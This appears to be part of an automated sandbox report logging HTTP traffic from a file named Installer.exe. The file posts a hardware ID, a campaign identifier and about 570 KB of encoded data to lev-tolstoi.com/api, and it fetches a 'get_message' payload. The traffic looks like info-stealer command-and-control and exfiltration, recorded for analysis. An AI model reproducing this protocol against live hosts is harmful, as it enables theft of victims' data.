                                                                                                                                                                                                                                                  2024-12-27 22:13:40 UTC1218OUTData Raw: 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 0d 0a 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: --I6ZOP83R0KContent-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--I6ZOP83R0KContent-Disposition: form-data; name="pid"1--I6ZOP83R0KContent-Disposition: form-data; name="lid"yau6Na--5223198671--I6ZOP83R0KCon
                                                                                                                                                                                                                                                  2024-12-27 22:13:40 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=89uvsgk959riipckt0hru5minr; expires=Tue, 22 Apr 2025 16:00:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BIuoa4l7ZB0gztrgQqrT%2BpvU9R1NsCDKB5TcAr9OsNGy8jIhEDj7q7OrS9b4OlGOG8jACVKmpyeZ6crloOedU3XPYtCaKt%2Fd%2B%2BYR5yUr%2FFP0utL0nQopHfi6crTSIGVVYw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca8bf2b72c44d-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1461&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2126&delivery_rate=1441263&cwnd=250&unsent_bytes=0&cid=a9d11f2404fbe9e0&ts=815&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:13:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.449743104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=8TXD8I0K6I3O97JCMUW
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 570573
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 2d 2d 38 54 58 44 38 49 30 4b 36 49 33 4f 39 37 4a 43 4d 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 38 54 58 44 38 49 30 4b 36 49 33 4f 39 37 4a 43 4d 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 54 58 44 38 49 30 4b 36 49 33 4f 39 37 4a 43 4d 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32
                                                                                                                                                                                                                                                  Data Ascii: --8TXD8I0K6I3O97JCMUWContent-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--8TXD8I0K6I3O97JCMUWContent-Disposition: form-data; name="pid"1--8TXD8I0K6I3O97JCMUWContent-Disposition: form-data; name="lid"yau6Na--52
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 16 7e 74 8a f5 dd e3 18 65 26 61 e0 49 9c 12 90 f2 e6 bf ff d4 22 e4 03 f8 5d 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96
                                                                                                                                                                                                                                                  Data Ascii: ~te&aI"]+L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\|H3
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 84 df b7 c4 33 99 55 bf 5c 15 f4 4f 0b 15 09 2f 16 46 34 ab e9 44 14 55 22 24 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93
                                                                                                                                                                                                                                                  Data Ascii: 3U\O/F4DU"$oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>X
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 1c 65 3a ef 2a 4f a1 ef c5 1e c3 50 4b af ee 2d 9a a8 3a 34 52 dc a0 7d 72 10 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b
                                                                                                                                                                                                                                                  Data Ascii: e:*OPK-:4R}r!B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 06 4c 0f e3 cd 08 e2 bb 5d 01 a1 65 8d 5b ca 0c e9 87 c4 e9 c5 4c de 84 4d f5 fd b9 38 b8 79 50 47 b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2
                                                                                                                                                                                                                                                  Data Ascii: L]e[LM8yPGW4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#]
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 50 20 c8 0c 39 a5 d8 68 e9 99 1d 29 5b 0a d0 bd 3d bc a6 bd 64 7b 2b b1 42 b8 41 90 d2 e4 c6 f7 72 e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53
                                                                                                                                                                                                                                                  Data Ascii: P 9h)[=d{+BArl[:9:rdEl|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDS
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: b0 87 36 b9 eb 75 52 85 c5 72 5f 94 b2 7f ac 99 e0 72 2e 90 21 62 31 1b 89 3c 84 91 e5 6d 96 b5 0b 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08
                                                                                                                                                                                                                                                  Data Ascii: 6uRr_r.!b1<m^YN%z**~d*7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 6d 0a 66 b2 e8 78 91 61 14 c8 ee 4b 78 48 a9 87 95 f8 81 b5 11 b3 ee 0e 92 a0 fb 0e f5 27 91 10 22 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf
                                                                                                                                                                                                                                                  Data Ascii: mfxaKxH'"w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc(
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: f1 e3 2e c9 c4 d2 7d 5d bf f3 c7 9f a1 4b 98 ee eb 27 7d 7b a2 0a 35 2f 12 f7 f7 00 fa 60 26 42 4b 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26
                                                                                                                                                                                                                                                  Data Ascii: .}]K'}{5/`&BK~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{*;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 10 4a 30 e7 f9 7a 3f b9 3e 42 2d 55 e9 b0 b6 b4 72 9d d6 78 39 f3 f7 93 73 a1 ed fb 02 38 47 cd 56 bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31
                                                                                                                                                                                                                                                  Data Ascii: J0z?>B-Urx9s8GV}E?@}36?>u%AnP|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y1
                                                                                                                                                                                                                                                  2024-12-27 22:13:45 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=1mi9bo7nq9ucm2i7mesokhvfgt; expires=Tue, 22 Apr 2025 16:00:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhjotjI1C0ty16zBuBiIKuuCrmOUQQuBifCJxavW7Aaf8c2lsALcgUMrCAv9Zg%2Bu25ww8DFGLFlr%2F0EcH6yVMUl3FOznTOxEPZBO0kHRqyC%2Bmo%2BMiMGMnTr7lKO3z758O4M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca8ce8cbbc3f3-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1499&rtt_var=599&sent=322&recv=588&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573120&delivery_rate=1947965&cwnd=190&unsent_bytes=0&cid=e48b452039189119&ts=2454&x=0"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.449747104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:46 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 87
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:46 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 26 6a 3d 26 68 77 69 64 3d 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41
                                                                                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=yau6Na--5223198671&j=&hwid=4EAC7AD5F775DFB71441EDD8E05CE3DA
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=auv6u9fvmhooqmh3e2jcfi2i9g; expires=Tue, 22 Apr 2025 16:00:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RucthsARfeqtVHc2D8Sm5oRC0p7JrqkpFBiMrscAe1OW7woYl5U4%2B1dqD0i30vPYDfrbyuFRBJr5YprqfCpecsAYV4C0BgtCSFwU6Ts8YG0Q0RvYxARmzj9qSqVrsiLPn18%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca8e61da58cda-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1820&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=986&delivery_rate=1569892&cwnd=242&unsent_bytes=0&cid=d675037ba59072d7&ts=776&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC250INData Raw: 33 36 38 63 0d 0a 4a 43 74 54 6d 6e 61 6a 45 41 6b 78 37 79 4f 2f 6e 62 43 45 43 4f 6e 78 6e 6e 43 68 43 43 52 33 47 68 6e 77 67 68 48 35 67 4d 52 2f 55 48 48 38 41 6f 45 71 4f 42 33 4e 52 70 32 6e 67 61 67 71 6a 64 4f 6b 55 75 6c 74 46 55 39 65 64 4b 44 32 65 35 44 30 6f 46 34 64 50 74 4d 4d 37 43 64 34 5a 36 35 54 2b 61 36 49 74 30 4f 6c 6c 73 34 61 35 56 31 53 41 55 31 4f 70 76 42 65 77 63 71 56 55 46 77 43 31 53 2f 57 49 6b 5a 36 33 6b 33 76 37 4f 6e 75 52 64 36 45 37 69 58 69 59 33 77 52 59 48 71 66 39 31 44 53 7a 6f 70 33 41 47 72 41 4c 50 52 6a 50 6b 61 48 45 4d 76 37 38 62 46 69 33 71 69 71 41 76 6c 72 44 77 64 7a 56 49 72 33 4a 35 58 52 6a 33 5a 50 44 37 55 34 32 6e 6b 39 64 64 74 55 6a 74 47 48 74 57 4f 4e 6b 4f 51 47 34 6b 31 34
                                                                                                                                                                                                                                                  Data Ascii: 368cJCtTmnajEAkx7yO/nbCECOnxnnChCCR3GhnwghH5gMR/UHH8AoEqOB3NRp2ngagqjdOkUultFU9edKD2e5D0oF4dPtMM7Cd4Z65T+a6It0Olls4a5V1SAU1OpvBewcqVUFwC1S/WIkZ63k3v7OnuRd6E7iXiY3wRYHqf91DSzop3AGrALPRjPkaHEMv78bFi3qiqAvlrDwdzVIr3J5XRj3ZPD7U42nk9ddtUjtGHtWONkOQG4k14
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 57 46 5a 65 73 63 56 66 6f 2b 6a 76 66 68 4d 33 72 42 7a 6d 55 57 6f 61 78 48 50 34 30 49 4c 59 4a 39 37 44 71 69 48 32 57 33 59 56 57 58 75 67 7a 58 61 6f 78 70 4a 46 47 69 50 67 4a 4a 5a 69 57 41 53 7a 44 49 6a 50 36 4c 5a 6c 6b 63 66 33 4f 63 35 71 53 45 64 41 59 49 47 31 59 4c 62 52 6a 32 55 41 48 66 34 79 31 69 6c 54 65 72 68 4d 34 37 4c 48 37 57 57 76 74 39 6b 63 79 7a 39 39 51 32 68 42 6b 36 6c 68 6b 4d 4f 2b 55 52 30 62 7a 7a 54 78 58 6b 46 2f 6c 6b 6d 4c 32 59 54 7a 4f 61 76 47 72 78 7a 4e 61 56 34 42 57 56 47 57 73 79 6d 39 37 5a 51 64 51 54 72 75 45 74 6b 6d 5a 48 69 56 62 49 6a 73 34 73 56 34 76 38 4b 6d 51 2b 70 45 5a 53 64 77 57 73 44 30 5a 36 37 58 6b 6c 5a 6b 61 39 4d 55 6c 45 68 2b 66 72 59 49 6a 64 4c 37 74 54 71 50 67 4d 63 61 37 44 35
                                                                                                                                                                                                                                                  Data Ascii: WFZescVfo+jvfhM3rBzmUWoaxHP40ILYJ97DqiH2W3YVWXugzXaoxpJFGiPgJJZiWASzDIjP6LZlkcf3Oc5qSEdAYIG1YLbRj2UAHf4y1ilTerhM47LH7WWvt9kcyz99Q2hBk6lhkMO+UR0bzzTxXkF/lkmL2YTzOavGrxzNaV4BWVGWsym97ZQdQTruEtkmZHiVbIjs4sV4v8KmQ+pEZSdwWsD0Z67XklZka9MUlEh+frYIjdL7tTqPgMca7D5
